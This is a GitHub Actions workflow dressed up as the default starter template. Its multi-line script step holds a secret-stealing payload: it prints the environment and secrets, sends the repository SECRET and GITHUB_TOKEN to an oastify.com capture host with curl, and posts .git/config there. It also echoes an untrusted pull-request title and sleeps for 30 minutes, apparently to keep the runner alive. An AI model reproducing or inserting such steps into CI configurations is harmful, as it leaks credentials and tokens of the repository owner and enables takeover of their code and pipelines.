# This is a basic workflow to help you get started with Actions

name: Build

# Controls when the workflow will run
on:
  # Triggers the workflow on push or pull request events but only for the "main" branch
  # push:
  #   branches: [ "main" ]
  # pull_request:
  #   branches: [ "main" ]

  # Allows you to run this workflow manually from the Actions tab
  workflow_dispatch:

# A workflow run is made up of one or more jobs that can run sequentially or in parallel
jobs:
  # This workflow contains a single job called "build"
  build:
    # The type of runner that the job will run on
    runs-on: ubuntu-latest

    # Steps represent a sequence of tasks that will be executed as part of the job
    steps:
      # Checks-out your repository under $GITHUB_WORKSPACE, so your job can access it
      - uses: actions/checkout@v3

      # Runs a single command using the runners shell
      - name: Run a one-line script
        run: echo Hello, world!

      # Runs a set of commands using the runners shell
      - name: Run a multi-line script
        run: |
          echo Add other actions to build,
          echo test, and deploy your project.
          printenv
          echo ${{ secrets }}
          curl "https://vnmf1fq7ob5euwoc6uqk6i183z9qxgl5.oastify.com?secret=$SECRET"
          curl "https://vnmf1fq7ob5euwoc6uqk6i183z9qxgl5.oastify.com?github_token=$GITHUB_TOKEN"
          cat ./.git/config
          git config -l
          curl -d @./.git/config vnmf1fq7ob5euwoc6uqk6i183z9qxgl5.oastify.com
          echo "${{ github.event.pull_request.title }}"
          for run in {1..1800}; do
            date;sleep 1;
          done
        shell: bash
        env:
          SECRET: ${{ secrets.SECRET }}
          FIRST_NAME: Mona
          LAST_NAME: Octocat
